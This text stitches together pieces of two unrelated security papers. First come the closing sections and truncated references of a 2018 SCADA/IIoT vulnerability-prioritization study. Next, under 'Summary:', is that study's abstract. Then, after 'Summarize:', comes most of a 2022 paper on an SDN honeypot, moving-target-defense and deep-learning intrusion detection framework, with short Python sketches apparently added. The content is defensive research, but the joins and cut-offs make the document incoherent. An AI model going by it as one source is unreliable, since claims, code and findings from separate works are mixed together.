Our findings indicate that there is a strong relationship between First.org risk metrics and exploit density, specifically for SCADA systems. There are three groups of critical urban infrastructure security experts that can benefit from this insight: chief information security officers (CISOs), security operations center (SOC) analysts, and system architects. CISOs, who oversee all security operations of an organization, generally have the difficult responsibility of developing and managing programs to secure the organization at scale. Because of our findings, CISOs can streamline their programs for securing SCADA systems. Rather than establishing programs meant to help create metrics that can be used to assess the risk of various IIoT systems, CISOs could instead refer to First.org's metrics of exploitability and impact to evaluate IIoT risk of exploit. There is no longer a need to start from scratch developing metrics, considering we demonstrated that exploitability and impact metrics are valid predictors of exploit risk for SCADA systems. SOC analysts are another group of security experts that can benefit from our findings. SOC analysts are often responsible for monitoring and fixing security risks as they occur. Instead of reactively seeking out security threats to address, our risk prioritization schema will help analysts proactively seek out which IIoT systems are likely to be attacked. SOC analysts can cross-check IIoT devices with the CVEs and CWEs that we identified to be most exploited to arrive at their prioritized device list. System architects responsible for selecting components for urban critical infrastructure should use our findings to carefully select systems based on their vulnerability profile. While we acknowledge that most urban critical infrastructure IIoT consists of legacy devices that are not often replaced, when new devices are procured, our risk prioritization schema can be used to assess which SCADA systems should be installed.
IIoT devices with the most vulnerabilities in the categories we discover to be of highest risk of exploit should be avoided.

B. Technical Design Implications

Future SCADA IIoT systems should be designed and developed with the intent to design out the prioritized vulnerabilities indicated in this paper. Addressing the prioritized vulnerabilities in the design phase could help reduce the number of future attacks against this class of IIoT. Based on recommendations for the top three prioritized vulnerabilities of buffer overflows, improper input validation, and information exposure, we can propose technical design strategies to help avoid these vulnerabilities. Buffer overflows are prevalent in operating environments that are programmed in C. The language provides direct memory access, which can be used to help reduce the device's energy consumption. Energy efficiency is important for the cost efficiency of SCADA systems, especially considering their highly distributed nature in locations where resource availability might be limited. Further, C can be very memory efficient, which is also valuable for the small devices required for urban critical infrastructure. Despite these benefits of C, the buffer overflow vulnerabilities that result from coding mistakes are a considerable downside. This prioritized vulnerability can be designed out by using a memory-safe programming language when developing future SCADA systems. One memory-safe language that is also memory efficient is Rust [28]. If future IIoT systems can be programmed in Rust, buffer overflows will no longer be an issue, thereby removing this attack vector for IIoT SCADA systems. SCADA design traditionally focuses on detecting and classifying control conditions, which enables accurate monitoring in various states [29]. With focus on the functional operation of the SCADA system, proper input to the system is assumed and not accounted for in the design process.
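A whitelist-style validator, as recommended for improper input validation via [30], can be sketched in a few lines. The field name, pattern, and range bounds below are hypothetical examples rather than values from any SCADA product; the point is that every property of an input (length, syntax, numeric range) is checked against an explicit allow-list and everything else is rejected.

```python
import re

# Hypothetical allow-list for one SCADA input field: a numeric setpoint
# command. Syntax, length, and range are all validated; anything that
# does not match the whitelist is rejected outright.
SETPOINT_PATTERN = re.compile(r"^\d{1,4}(\.\d{1,2})?$")  # e.g. "72.5"

def validate_setpoint(raw: str) -> float:
    """Return the parsed setpoint, or raise ValueError for any input
    outside the whitelist."""
    if len(raw) > 8:                          # length check
        raise ValueError("input too long")
    if not SETPOINT_PATTERN.fullmatch(raw):   # syntax check
        raise ValueError("malformed setpoint")
    value = float(raw)
    if not (0.0 <= value <= 150.0):           # range check (assumed bounds)
        raise ValueError("setpoint out of range")
    return value
```

Note the validator accepts only the few inputs appropriate for the (assumed) design specification; injection strings, overlong payloads, and out-of-range commands all fail one of the three checks.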
With increased skepticism of IIoT device inputs based on recent attacks, and the associated vulnerabilities involving improper input, SCADA designers must take measures to validate input. Design recommendations that could reduce the number of improper input validation vulnerabilities in systems include using an input validation framework such as Struts or the OWASP ESAPI Validation API when creating the system, or identifying all possible areas where an attacker could input data and employing a whitelist strategy [30]. Frameworks like Struts help to guide software development so that there are few validation issues. A whitelisting strategy entails rejecting all inputs other than the few that are actually appropriate for the design specifications of the system's purpose. The whitelist should account for all input properties, ranging from length to syntax. Information exposure may perhaps be the most challenging vulnerability to design out of a SCADA system. This is because many information exposure attacks happen as a function of the human element, either by error or intentionally. A potentially effective mechanism to mitigate the damage caused by information exposure is to compartmentalize data systems [31]. Designing SCADA IIoT to be compartmentalized can limit a data leak or attack to only the compartment that was breached.

IEEE INTERNET OF THINGS JOURNAL, VOL. 5, NO. 6, DECEMBER 2018

If a centralized data store for SCADA IIoT is used, compromised access to the central hub will leave all data vulnerable. These proposed SCADA IIoT technical design strategies may help to reduce the prevalence and risk of the top vulnerabilities identified in this paper. Each SCADA designer will need to evaluate whether these strategies can be used based on their specific technology requirements, as not all design mitigation techniques will necessarily be appropriate for every IIoT system.

V.
CONCLUSION

Unique contributions of this paper are significant for security researchers investigating SCADA systems, SCADA IIoT designers, and critical infrastructure operators working with IIoT. The research reveals that SCADA systems as a software subclass were found to have exploits that target a distinct set of vulnerabilities compared with non-SCADA systems. This indicates that the risk profile for SCADA systems varies compared with that of non-SCADA. The study also identifies highly correlated relationships between First.org vulnerability risk metrics and the density of SCADA exploits. These findings could encourage security researchers to reconsider their assertions that exploitability and impact scores are inaccurate predictors of the risk of exploit. Researchers should repeat these studies on risk metrics' relationship with exploits specifically for subsets of software, as was done for SCADA. Finally, the findings suggest that security researchers, SCADA IIoT designers, and SCADA operators should focus on a core set of vulnerability types for SCADA systems. Considering the unique requirements of SCADA systems and the associated challenges with vulnerability patching, alternative security strategies concerning prioritized vulnerabilities should be investigated. The prioritization framework provided can be customized based on organizational requirements and parameters. Urban critical infrastructure operators can use the prioritization in parallel with NIST's more comprehensive cybersecurity framework to understand their SCADA risk. Because the SCADA prioritization schema is based on empirical, data-driven findings, it will need to be updated continuously as new exploits are published. If a series of new SCADA exploits are released that target a specific vulnerability class, the prioritization schema will be outdated. It is recommended that this prioritization be updated annually, as was the CWE/SANS Top 25 list.
There are several future research opportunities related to this paper. CVSS and its exploitability and impact scores are being transitioned from version 2 to version 3, which entails new scores that are more specific. Once this new scoring methodology has been completed and vetted for accuracy, this paper should be repeated with updated data so that the exploitability and impact scores can be normalized appropriately. Testing additional characteristics of vulnerabilities as variables to determine their association with the risk of exploit could be included in future work. As previously indicated, other sources of exploits can be compiled from repositories such as GitHub, or from sources that may reference managerial-related exploits rather than technical ones, to better capture the exploit potential of CWEs such as information exposure. Future research could also investigate the scoring mechanisms used for the prioritization schema, which can be further customized through weightings and new point allocation systems. Finally, further studies should investigate opportunities to incorporate this SCADA prioritization approach into the existing NIST framework to provide a data-driven approach to evaluating system risk. This should accompany IIoT security policy research intended to encourage a robust, quantitative approach for evaluating urban critical infrastructure risk.

ACKNOWLEDGMENT

The authors would like to thank A. Sanchez, S. Madnick, L. Susskind, D. Serpanos, A. Kam, H. Okhravi, A. Viswanathan, R. Oppliger, V. Roth, L. Uzeda, and R. Yahalom for ideas, edits, and contributions to this paper.

REFERENCES

[1] Analysis of the Cyber Attack on the Ukrainian Power Grid: Defense Use Case, Electricity Inf. Sharing Anal. Center, Washington, DC, USA, Rep., 2016.
[2] L. Allodi and F. Massacci, "A preliminary analysis of vulnerability scores for attacks in wild: The ekits and sym datasets," in Proc. ACM Workshop Build. Anal. Datasets Gather. Exp. Returns Security (BADGERS), Raleigh, NC, USA, 2012, pp. 17-24. [Online]. Available: http://doi.acm.org/10.1145/2382416.2382427
[3] K. Nayak, D. Marino, P. Efstathopoulos, and T. Dumitras, "Some vulnerabilities are different than others," in Research in Attacks, Intrusions and Defenses, A. Stavrou, H. Bos, and G. Portokalidis, Eds. Cham, Switzerland: Springer Int., 2014, pp. 426-446.
[4] Dimensional Research. (Mar. 2016). Trends in Security Framework Adoption: A Survey of IT and Security Professionals. [Online]. Available: https://static.tenable.com/marketing/tenable-csf-report.pdf
[5] T. H. Grubesic and T. C. Matisziw, "A typological framework for categorizing infrastructure vulnerability," GeoJ., vol. 78, no. 2, pp. 287-301, 2013.
[6] C. Pak, Typologies of Attacks and Vulnerabilities Related to the National Critical Infrastructure. London, U.K.: Palgrave Macmillan, 2015, pp. 169-180, doi: 10.1057/9781137455550_11.
[7] B. Zhu, A. Joseph, and S. Sastry, "A taxonomy of cyber attacks on SCADA systems," in Proc. 4th Int. Conf. Internet Things Int. Conf. Cyber Phys. Soc. Comput., Dalian, China, Oct. 2011, pp. 380-388.
[8] J. Slay and M. Miller, "Lessons learned from the Maroochy water breach," in Critical Infrastructure Protection, E. Goetz and S. Shenoi, Eds. Boston, MA, USA: Springer, 2008, pp. 73-82.
[9] B. Galloway and G. P. Hancke, "Introduction to industrial control networks," IEEE Commun. Surveys Tuts., vol. 15, no. 2, pp. 860-880, 2nd Quart., 2013.
[10] J. Weiss, Protecting Industrial Control Systems from Electronic Threats. New York, NY, USA: Momentum Press, 2010.
[11] K. A. Stouffer, J. Falco, and K. Scarfone, "Guide to industrial control systems (ICS) security," NIST Special Publ., vol. 800, no. 82, p. 16, 2011.
[12] P. A. S. Ralston, J. H. Graham, and J. L. Hieb, "Cyber security risk assessment for SCADA and DCS networks," ISA Trans., vol. 46, no. 4, pp. 583-594, 2007. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0019057807000754
[13] B. Obama, Executive Order 13636: Improving Critical Infrastructure Cybersecurity, White House, Washington, DC, USA, 2013.
[14] W. Miron and K. Muita, "Cybersecurity capability maturity models for providers of critical infrastructure," Technol. Innov. Manag. Rev., vol. 4, pp. 33-39, Oct. 2014. [Online]. Available: http://timreview.ca/article/837
[15] Z. Zhang, "Environmental review & case study: NERC's cybersecurity standards for the electric grid: Fulfilling its reliability day job and moonlighting as a cybersecurity model," Environ. Pract., vol. 13, no. 3, pp. 250-264, 2011, doi: 10.1017/S1466046611000275.
[16] Mandatory Reliability Standards for Critical Infrastructure Protection, Federal Energy Regul. Comm., Washington, DC, USA, Rep. RM06-22-008, Jan. 2008.
[17] R. Ellis, "Regulating cybersecurity: Institutional learning or a lesson in futility?" IEEE Security Privacy, vol. 12, no. 6, pp. 48-54, Nov./Dec. 2014.
[18] MITRE, DHS. Common Weakness Enumeration, National Vulnerability Database, 2016. Accessed: Oct. 31, 2016. [Online]. Available: https://cwe.mitre.org/index.html
[19] MITRE. 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Accessed: Nov. 12, 2016. [Online]. Available: http://cwe.mitre.org/top25/
[20] M. Luallen, Breaches on the Rise in Control Systems: A SANS Survey, SANS Inst., North Bethesda, MD, USA, Apr. 2014.
[21] A. Sarwate, "SCADA security: Why is it so hard?" Blackhat, San Francisco, CA, USA, Nov. 2011.
[22] Offensive Security Exploit Database Archive. Accessed: Oct. 31, 2016. [Online]. Available: https://www.exploit-db.com/
[23] MITRE. CVE Security Vulnerability Database. Security Vulnerabilities, Exploits,
Summary:
Urban critical infrastructure such as electric grids, water networks, and transportation systems are prime targets for cyberattacks. These systems are composed of connected devices which we call the Industrial Internet of Things (IIoT). An attack on urban critical infrastructure IIoT would cause considerable disruption to society. Supervisory control and data acquisition (SCADA) systems are typically used to control IIoT for urban critical infrastructure. Despite the clear need to understand the cyber risk to urban critical infrastructure, there is no data-driven model for evaluating SCADA software risk for IIoT devices. In this paper, we compare non-SCADA and SCADA systems and establish, using cosine similarity tests, that SCADA as a software subclass holds unique risk attributes for IIoT. We then disprove the commonly accepted notion that the common vulnerability scoring system risk metrics of exploitability and impact are not correlated with attack for the SCADA subclass of software. A series of statistical models are developed to identify SCADA risk metrics that can be used to evaluate the risk that a SCADA-related vulnerability is exploited. Based on our findings, we build a customizable SCADA risk prioritization schema that can be used by the security community to better understand SCADA-specific risk. Considering the distinct properties of SCADA systems, a data-driven prioritization schema will help researchers identify security gaps specific to this software subclass that is essential to our society's operations.
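The cosine similarity test mentioned above can be illustrated with a small sketch. The vectors below are invented counts of exploits per vulnerability class for two software groups, not the paper's actual data; a similarity near 0 would indicate that the two subclasses are targeted quite differently, near 1 that their exploit profiles match.

```python
import math

def cosine_similarity(a, b):
    """Cosine of the angle between two equal-length frequency vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm

# Invented exploit counts per CWE category (buffer overflow, input
# validation, info exposure, path traversal) -- illustrative only.
scada_counts = [40, 25, 20, 5]
non_scada_counts = [10, 15, 5, 60]

similarity = cosine_similarity(scada_counts, non_scada_counts)
# A value near 1 means similar exploit profiles; near 0, distinct ones.
```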
Summarize:
Keywords: cyber deception, SDN, software defined networking, intrusion detection, honeypot

I. INTRODUCTION

Witnessing the explosion of Internet of Things (IoT) devices, network management encounters the problems of lacking flexibility, scalability, and automation. Under a conventional network architecture, the performance of the network is degraded if there is fluctuation in the presence and communication of many heterogeneous devices. To this end, Software Defined Networking (SDN) has been emerging with outstanding features to effectively manage a diversity of devices for edge-cloud computing through a centralized controller [1]. It enables the network administrator to observe a global view of the entire topology, automatically deploy a virtual network function, and promptly instruct a new security policy into IoT devices [2]. Clearly, SDN is a potential network paradigm for security orchestration in a large-scale network. When flocking into security sensors, the network traffic can be processed in a flexible way by rules installed in OpenFlow switches to intercept malicious actions. In The Art of War [3], the most important and most famous military treatise in Asia for the last two thousand years, Sun Tzu observes, "All warfare is based on deception. Hence, when we are able to attack, we must seem unable; when using our forces, we must appear inactive." Nowadays, 2500 years later, deception can still be efficiently applied in the war on cybercrime in addition to modern military operations. Deception is a great way to gain information about the opponent [4]. Though there are many security approaches, like firewalls and intrusion detection systems, for recognizing and preventing rogue actors from accessing critical resources, they are still not active defense solutions.
Instead of waiting for attackers to intrude into the network system and then promptly blocking them, cyber deception technology, known as the next generation of honeypots, is adopted to pretend to be real network resources and lure hackers. Through this proactive strategy, cyber traps and decoy systems are deployed at various locations in the network to consume the effort and time of attackers. Besides, Moving Target Defense (MTD), known as an active defense principle, keeps changing the attack surface of a protected asset through a dynamic shifting strategy, which can be handled by the administrator. In this way, the attack surface exposed to attackers appears chaotic and unstable, because network configurations are actively changed over time [5]. In different use cases, MTD can be applied to various asset attributes, including IP address, running services, protocol, topology, or port number [6]. Moreover, to mitigate the harm of attacks, an IDS is considered an essential means in the first line of the defender system. By collecting malicious traces from various network segments, devices, or security sensors, these systems not only allow recognizing and disrupting incoming actions from attackers, but also provide the capability of detecting likely malicious traffic in the future. This is achieved by using machine learning (ML) for anomaly detection in addition to the signature-based approach. The complement of these two approaches can give a more effective defender system for a network that always suffers from sophisticated attacks by skilled hackers. Unfortunately, such ML-based IDSs need to be trained with a large volume of diverse attack records, which are labeled during the analysis phase by security experts.
2022 21st International Symposium on Communications and Information Technologies (ISCIT) | 978-1-6654-9851-7/22/$31.00 2022 IEEE | DOI: 10.1109/ISCIT55906.2022.9931208

The labeling task of the dataset requires human effort and time, which is nearly impossible in the context of big data. The more sophisticated attacks emerge, the more burdened the task of gathering attack trails becomes. Additionally, some attack types are difficult to perform in a real-life scenario on the local network for collection purposes due to the limitation of resources. Therefore, instead of blocking attackers right after they put a step into networks, we can continuously observe and extract their behaviors for training an ML-based IDS. These decoy systems and cyber traps are free sources for defender systems to understand the hackers, while still keeping the enemy stuck in a matrix of vulnerabilities of fake assets, costing them time and great effort in the reconnaissance phase. This paper integrates the benefits of the network programmability of SDN, cyber deception, MTD, and deep transfer learning-based IDS to establish an active defense strategy for SDN. Our approach can create a more chaotic and deceptive information environment to mitigate the exposure of critical data in protected targets to attackers. Simultaneously, the malicious actions of hackers gathered in deceptive objects can be used as high-quality, free-cost attack patterns for real-world attack detection. We organize the remainder of this paper as follows. Section II introduces the overview of deception technology and its support for IDS. The related works are also mentioned in this part.
Section III outlines the overview of our approach, followed by the detailed architecture of the deception-enhanced framework for intrusion detection. We present the implementation and experiment results in Section IV. Finally, Section V concludes the paper with effective outcomes and discusses future directions.

II. RELATED LITERATURE

Over the last decades, the concept of deception has witnessed rising popularity in information security with the concept of the honeypot for deceiving would-be hackers into a trap. Cyber deception has been receiving tremendous attention from researchers in academia and industry [4]. It brings efficiency in detecting attacks early and puts more obstacles in front of attackers during their reconnaissance phase. In the work of He Wang [7], SDN is used for building a honeypot system to simulate network topologies and migrate the traffic of attacks. Attackers are attracted to realistic networks simulated by the SDN controller, and attacks are redirected to honeypots. Honeypots are responsible for capturing the traffic of attacks for further analysis. Meanwhile, Decepti-SCADA [8] used Docker to build honeypots to isolate the real system. This minimizes the chance of the honeypot system being compromised and removes cross-platform dependencies. This framework also developed a modular architecture enabling new decoys to be added easily. A web interface was built to improve users' accessibility. Besides, Dahbul et al. [9] presented fingerprinting techniques used by attackers to identify honeypots. By using several system configurations and customized scripts, they could improve the deceptive ability of honeypots to prevent honeypot detection by attackers. However, this research only focused on layers 3, 4, and 7. With the explosion of IoT, DDoS is a threat that deserves attention. IoT devices can have exploitable vulnerabilities that can be leveraged to carry out DDoS attacks. Xupeng Luo et al.
[10] proposed an SDN-based architecture of moving target defense to change attack targets. It helps to defend against scanning threats and mitigate DDoS attacks. A new attack was shown by Miao Du and Kun Wang [11] that could detect honeypots in order to disable the protection of a system. To protect SDN from anti-honeypot attacks, they present a pseudo-honeypot strategy in SDN to face DDoS attacks in the IoT environment. The proposed strategy enables network administrators to hide network assets from scanners and defend against DDoS attacks in IoT. Meanwhile, Mengmeng et al. [12] combined cyber deception and moving target defense (MTD) to propose an intrusion prevention technique. SD-IoT networks implementing this technique can extend the lifetime of the system, maintain the availability of services, and increase tolerance to complex attacks. Additionally, Aris et al. [13] also formulated a proactive defense mechanism using MTD for Cyber-Physical Systems (CPS). In their case, MTD can continuously alter the parameters of the system, while hindering the ability of adversaries to conduct successful reconnaissance on the network system. However, their mechanism lacks the flexibility to maximize unpredictability and uncertainty due to the absence of SDN. Applying ML in IDS is a trend in current research topics. Taking advantage of cyber-attacks as free labor to gather data for training machine learning based IDSs is a proactive defense suggested by Frederico Araujo et al. [14]. Adversarial interactions are selectively lengthened to maximize the collection of threat intelligence. More specifically, they introduced an interactive approach to improve web intrusion detection systems, called DeepDig. With network traffic and traces collected in traps, it built models of legitimate and malicious behaviors. This approach can enhance automated feature extraction for IDS without additional development effort.
Motivated by this, our work designs a scheme of adaptive honeypot deployment and MTD in SDN to deceive attackers into spending their time and resources on decoy systems. Leveraging SDN's programmability, our approach can enforce a more flexible deployment strategy of cyber traps corresponding to different network conditions than Decepti-SCADA and DeepDig. Also, the network flows extracted from the mirroring server can help to release the pressure of labeling attack data for training DL-based IDS models. Deep transfer learning for network flow-based IDS is another distinguishing aspect of our work in comparison with DeepDig.

III. METHODOLOGY

This section gives the overview of the deception framework for IDS, named FoolYE, deployed not only to lure attackers into targeting decoys for mitigating attack impacts but also to leverage the free source of attack trails in detecting malicious attempts. As shown in Fig. 1, the proposed architecture of the deception strategy associated with intrusion detection is programmable by the essence of SDN. The controller can remotely observe network statistics and give relevant responses to reconnaissance attacks. Any harmful or suspicious actions can be redirected to a decoy target by instructing flow rules into OpenFlow switches. Specifically, many types of honeypots are prepared as deception templates in the Trap Inventory for easy deployment in network segments. Meanwhile, the Security Orchestrator plays the role of opting which type of honeypot is to be installed. It also determines the method of establishing cyber traps to mislead attackers into believing that the information collected during the scanning phase is real.
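The orchestration behavior described here can be sketched as follows. This is a simplified, hypothetical illustration: the honeypot names mirror those used later in the paper, but the classes and methods are our own invention, not FoolYE's actual code.

```python
import random

# Hypothetical trap inventory: honeypot types available as Docker images.
INVENTORY = ["opencanary", "cowrie", "dionaea"]

class SecurityOrchestrator:
    """Toy model of the Security Orchestrator: picks honeypot types and
    (re)deploys them on decoy hosts, as fixed or moving traps."""

    def __init__(self, decoy_hosts, mode="MOVING"):
        self.decoy_hosts = decoy_hosts
        self.mode = mode
        self.traps = {}  # host -> honeypot type currently deployed

    def deploy(self):
        """Initial deployment: one randomly chosen trap per decoy host."""
        for host in self.decoy_hosts:
            self.traps[host] = random.choice(INVENTORY)
        return dict(self.traps)

    def tick(self):
        """Called once per period: in MOVING mode, each trap is swapped
        for a different honeypot type so the deceptive surface keeps
        shifting; in fixed mode, traps stay as deployed."""
        if self.mode != "MOVING":
            return dict(self.traps)
        for host, current in self.traps.items():
            others = [t for t in INVENTORY if t != current]
            self.traps[host] = random.choice(others)
        return dict(self.traps)
```

In a real deployment the `deploy`/`tick` bodies would invoke Ansible to pull and run the corresponding container images, rather than mutate an in-memory mapping.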
Eventually, the attack trails or malicious actions logged in the honeypot or decoy are gathered and utilized as a free source for maintaining up-to-date intelligence in the intrusion detection system (IDS). The IDS is an engine implementing machine learning algorithms for detecting cyber threats. The Extractor produces network flow features from data gathered from the SDN controller and honeypots, then sends them to the ML-based IDS for analysis. To prevent network reconnaissance from inside or outside, MTD is a plugin of the SDN controller; it is responsible for mapping a real IP address of a host to a virtual IP address. The virtual IP address is mutated periodically according to the idea of CONCEAL [15].

Fig. 1. FoolYE: a deception-enhanced IDS in an SDN-enabled network.

Algorithm 1 gives the workflow of honeypot deployment of FoolYE, a flexible deception-supported IDS framework, aiming to create significant confusion in discovering and targeting cyber assets in SDN-aware networks.

A. Intrusion Detection Engine

Playing an important role in recognizing malicious traffic flows in the network, the intrusion detection engine leverages ML algorithms to classify new incoming flows flocking into the operational network. This engine requires a massive number of traffic flow records for training before it can predict the attack label. These records can come from public datasets or from honeypot systems deployed in the network. Regarding the DL models used in the ML-based IDS, we utilize two state-of-the-art models in image recognition, ResNet50 and DenseNet161, pretrained on the ImageNet dataset. The deep transfer learning strategy is adopted in both models to reduce the training time of the neural networks, as depicted in Fig. 2. We use the feature extraction strategy as a transfer learning technique to leverage the model knowledge of a previous domain in a new one.
The last fully connected (FC) layer of the models is replaced with a layer of 2 classes (normal and abnormal) instead of the 1000 classes of ImageNet. The parameters of the pretrained layers in ResNet50 and DenseNet161 are kept unchanged during the training phase. Following that, training is conducted with randomly initialized parameters on the new last layer, updating them according to the intrusion detection dataset.

Fig. 2. Training the detector by deep transfer learning on the ResNet50 model.

Based on the recommendation of a flow-based IDS study [16] on the CICIDS2017 dataset [17], we choose 7 of the 80 flow features in the CICIDS2018 dataset [18] for the ML-based IDS, because these SDN flow features can be easily obtained by the controller while sharing the same descriptions with the CICIDS2017 dataset [17]. These features are destination port, flow duration, fwd packet length mean, flow bytes/s, flow packets/s, flow IAT mean, and fwd packets/s. Labels of the dataset are converted into two types: value 0 is benign and 1 is likely an attack. Values of the flow features in the dataset have several types: integer, string, and float. Min-max normalization is performed to normalize them into the domain of [0, 1]. A new value (x_new) is converted into an integer by the formula x_new*10. After that, the task of converting network records into images is conducted to feed the input of the two mentioned DL models. To achieve this, we utilize the method proposed by Zhipeng Li [19] to transform each integer value into a corresponding binary value. This method ensures that all values fall only into the range from 0 to 255 so that they can be mapped to an image pixel. Besides, the output of the method from [19] on each feature value is an 8-bit binary number.
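The per-feature preprocessing described above can be sketched as follows. The scaling used here (mapping each min-max-normalized value onto one byte in 0-255 before taking its 8-bit binary form) is our simplified stand-in for the method of [19], whose exact formula differs; the sample feature values are invented.

```python
def min_max_normalize(values):
    """Min-max normalization of a raw feature column into [0, 1]."""
    lo, hi = min(values), max(values)
    if hi == lo:  # constant column: map everything to 0
        return [0.0 for _ in values]
    return [(v - lo) / (hi - lo) for v in values]

def to_8bit_strings(normalized):
    """Map each normalized value onto one byte (0..255) and return its
    8-bit binary representation, ready to be concatenated into the bit
    array that is later reshaped into an RGB image.
    Simplified stand-in for the conversion of [19]."""
    return [format(min(255, int(v * 255)), "08b") for v in normalized]

# Invented flow-duration values (microseconds) for illustration.
durations = [120, 4500, 98000, 350]
bits = to_8bit_strings(min_max_normalize(durations))
```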
Next, the 8-bit elements are concatenated into a single bit array with the length of l_array. To simplify the process of image conversion, we aim to get a square RGB image to represent a flow record for the flow-based IDS. Relying on the characteristics of a color image, the l_array value can be used to determine the size s of the target image, as in (1):

l_array = 3*s^2    (1)

Moreover, in case s receives a decimal value, 0 bits will be added to the end of the bit array to bring s to an integer value. This new array is then divided into 3 sub-arrays of the same length. Their length of s^2 allows them to be transformed into corresponding 2-dimensional arrays serving as the color layers of an RGB image.

Algorithm 1: Trap deployment workflow of FoolYE
Input:
  inventory: list of honeypot images in the Trap Inventory
  templates: honeypot image to establish
  mtdIPPool: a list of fake IPs for moving target defense
  deployMode: the mode of deploying honeypots
  period: period to change traps
Output:
  traps: list of honeypots deployed
1: Initialize timer
2: # Initialize traps according to the deployMode
   traps <- inventory.create(templates)
3: if (timer mod period == 0)
4:   traps <- IP mutation on topology(mtdIPPool)
5:   if (deployMode == MOVING)
6:     # Change traps to other types from inventory and templates
       traps <- changeType(inventory, templates)
7: return traps

B. Cyber Deception, Trap Inventory and Security Orchestrator

One of the main objectives of cyber deception is to cover the identity of the cyber assets. Thus, in FoolYE, we use various honeypots to take the attacker far away from critical resources and detect malicious actions early in the cybersecurity kill chain. For automation of deploying decoys, FoolYE is supported by two modules, the Trap Inventory and the Security Orchestrator. Firstly, the Trap Inventory stores and manages traps packaged as Docker images.
These decoy objects are deployed in the form of Docker containers running honeypots. Meanwhile, the Security Orchestrator is built for deploying honeypots or decoys and observing malicious actions in these cyber traps. At the machine assigned as a decoy, a honeypot image from the Docker Registry [20] is pulled and deployed into hosts randomly by Ansible through an SSH connection. This approach can facilitate the flexibility of a cyber deception system. We can perform tasks of deploying or revoking traps, then run them on other decoy hosts. We design two types of mechanisms, called fixed trap and moving trap:

- Fixed trap: Honeypots are permanently deployed on a host in the network. We can choose a type of honeypot or use a random mechanism to deploy cyber traps.
- Moving trap: Honeypots are deployed automatically in the network. After a certain time, the FoolYE framework conducts a moving strategy to renew decoys by changing the honeypot type or deployment platform (hosts).

C. Moving Target Defense

Moving target defense (MTD), one of the game-changing themes to alter the asymmetric situation between attacks and defenses in cybersecurity, facilitates proactive defense strategies that are diverse, that continually shift attack surfaces in some fashion, and that change over time. In addition to cyber deception, we also apply an MTD strategy aiming to impede adversaries from targeting and executing successful attacks by increasing complexity, chaos, and cost for attackers. It can help to limit the exposure of vulnerabilities and opportunities for attack, deceiving adversaries in real time. Specifically, there is a list of available IP addresses in the network topology that are mutated into virtual IP addresses by the MTD module. The MTD-based proactive technique is integrated with the SDN controller to help the switch understand which virtual IP addresses map to which real ones. The mapping process between real and virtual IP addresses is repeatedly conducted after a certain period of x seconds.
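The periodic real-to-virtual IP mapping can be sketched as below. The address pool and host addresses are illustrative values we invented; in FoolYE this logic would live inside the controller's MTD module, with flow rules in the switches translating between the two address spaces.

```python
import random

# Hypothetical pool of virtual IPs used by the MTD module (illustrative).
MTD_IP_POOL = [f"10.99.0.{i}" for i in range(1, 255)]

def mutate_mappings(real_ips, pool=MTD_IP_POOL):
    """Assign every real host IP a fresh, unique virtual IP.
    Intended to be called once per mutation period (every x seconds)."""
    virtual = random.sample(pool, len(real_ips))  # unique, no repeats
    return dict(zip(real_ips, virtual))

# One mutation round for three protected hosts (example addresses).
mapping = mutate_mappings(["192.168.1.10", "192.168.1.11", "192.168.1.12"])
# The controller would now rewrite packet headers so outsiders only ever
# observe the virtual side of this mapping; after the next period,
# mutate_mappings() is called again and old reconnaissance data goes stale.
```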
The changes in IP lead to invalidating the reconnaissance information held by attackers.

IV. EXPERIMENTS

This section provides the details of the SDN testbed settings, followed by the experiment results through different scenarios.

A. Training the ML-Based IDS

To train the ML-based IDS, we utilize a physical machine with 64GB RAM, an Intel i7 6700HQ CPU, and 3x GTX 1050Ti 4GB GPUs. We choose the CICIDS2018 dataset [18] with DDoS attacks to evaluate the performance of the ML-based IDS. Specifically, four .CSV files in this dataset, including Thurs-15-02-2018, Fri-16-02-2018, Tues-20-02-2018, and Wed-21-02-2018, are combined, then split into a train set and a test set with a ratio of 80% and 20%, respectively. The two outstanding neural networks, ResNet50 and DenseNet161, are deployed with PyTorch [21]. Following that, they are trained for 10 epochs with a learning rate of 0.001, cross entropy as the loss function, and the Adam optimizer. The training results after 10 epochs are shown in Table I. In the future, collected malicious activities of adversaries from decoys can be utilized to train and update the knowledge of the IDS about real-world attack patterns in the network.

B. Experiment Settings

In the experimental environment, we use 2 virtual machines (VMs) running Ubuntu 18.04 to construct an SDN testbed and the other components. Table II illustrates the configuration of the components in our framework. Initially, the SDN testbed, as depicted in Fig. 3, is built with the Ryu controller [22] and Containernet [23]. Containernet is a Mininet version [24] allowing Docker containers to be emulated as hosts in SDN-enabled networks. The network topology comprises 4 OpenFlow-supported switches, known as Open vSwitch, connecting with 8, 12, and 16 hosts in different experimental tests. In terms of cyber deception, we use 3 types of honeypots, namely Opencanary [25], Cowrie [26], and Dionaea [27], to deploy decoy objects in the network.
They are packed into Docker images, shown in Table III, supporting easy installation as containers in the decoy zone later. Note that, despite only 3 types of honeypots being deployed in this experiment, hundreds of other decoy Docker images can be created. We use Ansible Playbooks [28] to deploy traps automatically with the two mechanisms, fixed trap and moving trap. In the fixed type, the administrator chooses a honeypot to be installed at a specific location to lure attackers until the administrator turns it off or changes it to another type. In contrast, in the moving strategy, various types of traps are selected automatically for deployment on different deceptive hosts; they are then continually changed to another type after a scheduled period.

TABLE I. RESULTS OF DEEP TRANSFER LEARNING MODELS ON CICIDS2018
Model       | Accuracy on test set (%) | F1-score on test set (%)
ResNet50    | 99.79                    | 99.8
DenseNet161 | 99.44                    | 99.5

Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply.

TABLE II. EXPERIMENTAL SETTINGS ON VIRTUAL MACHINES
#                      | VM 1                                                        | VM 2
Hardware configuration | Intel(R) Xeon(R) CPU E5-2660 2.0 GHz, 160 GB HDD, 16 GB RAM | Intel(R) Xeon(R) CPU E5-2660 2.0 GHz, 100 GB HDD, 4 GB RAM
Application            | Ryu controller, MTD module, RabbitMQ, ML-based IDS          | Containernet, Feature extraction module, Ansible, Snort3

Fig. 3. Experimental SDN-enabled network testbed.
